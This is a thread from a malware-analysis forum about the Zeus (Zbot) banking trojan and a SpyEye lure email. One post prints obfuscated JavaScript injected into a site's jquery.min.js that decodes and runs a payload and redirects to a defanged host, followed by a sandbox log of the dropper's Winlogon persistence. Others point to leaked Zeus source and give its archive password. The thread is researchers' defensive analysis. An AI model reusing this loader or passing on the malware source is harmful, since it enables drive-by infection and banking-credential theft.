Win32/Zeus (alias Zbot)

Forum for analysis and discussion about malware.
rossetoecioccolato
Posts: 29
Joined: Sat Apr 10, 2010 2:09 pm

Re: W32/Zbot

Post by rossetoecioccolato » Tue Feb 01, 2011 6:39 pm

> Ive found when using certain types of wireless via host and vm, this can also be a bad thing. <

I suppose that is only something that you get if somebody really likes you. :-| Would be interested though if there is anything that you can share. Did you look for rooted firmware in the SRAM of the wireless adapter?

PX5
Posts: 144
Joined: Thu Apr 29, 2010 1:14 am

Re: W32/Zbot

Post by PX5 » Tue Feb 01, 2011 8:12 pm

Actually....I havent a clue but any tdss\tdl dns changer would do the trick I assume, the host was XP SP3 and I was using VBox but its been atleast a year ago when it happened, DNS Settings for both host and guest were tainted.

Thats about it, I did feel special for the moment, as in Short Bus Special but the moment passed quickly. ;)
Arrogance led me to my Ignorance

rossetoecioccolato
Posts: 29
Joined: Sat Apr 10, 2010 2:09 pm

Re: W32/Zbot

Post by rossetoecioccolato » Wed Feb 02, 2011 11:51 pm

> DNS Settings for both host and guest were tainted.<

Sorry, I misread your previous post. You were referring to a wireless router and I was thinking of a certain wireless network adapter. Virtually any hardware that is shared between the guest and host can lead to migration from guest to host partition. Thanks for sharing your experience.

markusg
Posts: 734
Joined: Mon Mar 15, 2010 2:53 pm

Re: W32/Zbot

Post by markusg » Sat Feb 05, 2011 6:19 pm

zbot
You do not have the required permissions to view the files attached to this post.

markusg
Posts: 734
Joined: Mon Mar 15, 2010 2:53 pm

Re: W32/Zbot

Post by markusg » Thu Feb 10, 2011 1:56 pm

You do not have the required permissions to view the files attached to this post.

User avatar
gjf
Posts: 198
Joined: Mon Mar 15, 2010 10:23 am
Location: Where I lay my head is home
Contact:

Re: W32/Zbot

Post by gjf » Fri Feb 18, 2011 12:00 am

Some new story. Some Russian sites presents to the user some js in jquery.min.js.
This code redirects to host hxxp://bul0va.com/index.php?tp=f67f75493a6182fa with html which uses Java applet with unique "pid" parameter to perform decoding in the following part of embedded js:

Code: Select all

var vrq = null;var mgi = document.styleSheets[0].rules || document.styleSheets[0].cssRules;for(var dcwes = 0; dcwes < mgi.length; dcwes++) {var ztffs = mgi.item ? mgi.item(dcwes) : mgi[dcwes];roz=(ztffs.cssText) ? ztffs.cssText : ztffs.style.cssText;vrq = roz.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};var s = "";var g = function(){return this;}();dtvu = g["e"+vrq.substr(0,2)+"l"];clrn = document.getElementsByTagName("textarea")[9-9].value.split(",");hqon=dtvu(vrq.substr(2));for (var i = 0; i < clrn.length; i++) {bzmwy = 9501 - 1*clrn[i];s += hqon(bzmwy);}dtvu(s);
where "textarea" - some data in js.

After that depending on OS version nix-systems are forwarded to Google and Win systems receives a dropper in %temp% which starts after that

This file has low detect and packed with UPX:

Code: Select all

UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
There is another prot under UPX:

Code: Select all

AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER [Overlay] *
but the version is fake - the prot is modified slightly

The file is typical Zbot, maybe new, maybe old but repacked:

Code: Select all

Executing: d:\mxmt-upx.exe
...
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [d:\mxmt-upx.exe]
CreateMutex(_AVIRA_21099) [d:\mxmt-upx.exe]
...
RegCreateKeyEx(HKLM\software\microsoft\windows nt\currentversion\winlogon,(null)) [d:\mxmt-upx.exe]
RegSetValueEx(HKLM\software\microsoft\windows nt\currentversion\winlogon\userinit, REG_SZ: C:\WINDOWS\System32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) [d:\mxmt-upx.exe]
DeleteFile(C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Copy(D:\mxmt-UPX.exe->C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Anubis logs, CWSandbox logs.

Original dropper is attached, the pasword is infected.
You do not have the required permissions to view the files attached to this post.
VirusInfo / Defendium / SafeZone Helpers Crew

User avatar
gjf
Posts: 198
Joined: Mon Mar 15, 2010 10:23 am
Location: Where I lay my head is home
Contact:

Zeus Sources

Post by gjf » Wed May 11, 2011 9:12 pm

Just because this sources has leaked from closed mailings to public I can give a link here too :)
Sources are as old as 2.0.8.9.
For everybody who is interested.
VirusInfo / Defendium / SafeZone Helpers Crew

Fabian Wosar
Posts: 88
Joined: Thu Aug 26, 2010 8:23 am
Location: Germany
Contact:

Re: Zeus Sources

Post by Fabian Wosar » Wed May 11, 2011 9:39 pm

The password is "zeus" by the way ;).
Best regards,

Fabian Wosar [Development]
Emsisoft Team - www.emsisoft.com

Flamef
Posts: 65
Joined: Thu Jul 07, 2011 6:06 pm

Amy's death and Spyeye,already exploited?

Post by Flamef » Sat Jul 30, 2011 12:31 pm

So,i was browsing a forum and suddenly a message arrived at my box>Subject " Amy Winehouse moments before death "
A file was attached,it was password protected,it's a new trick a guess,since i saw a warning"The file update socking video footage realleased of Amy Winehouse moments before death.zip is password protected and cannot be scanned for viruses.
Some pictures of the interesting infected file>
Image
Image



Virus total scan > http://www.virustotal.com/file-scan/rep ... 1312027915
4/43

McAfee 5.400.0.1158 2011.07.30 PWS-Spyeye.bx

I don't know if this is the right place to attach the sample,if you need the sample to analyze it etc,hit me a pm or post here.

User avatar
EP_X0FF
Global Moderator
Posts: 4872
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Amy's death and Spyeye,already exploited?

Post by EP_X0FF » Sat Jul 30, 2011 1:06 pm

Please attach it here in password protected archive.
Ring0 - the source of inspiration

Post Reply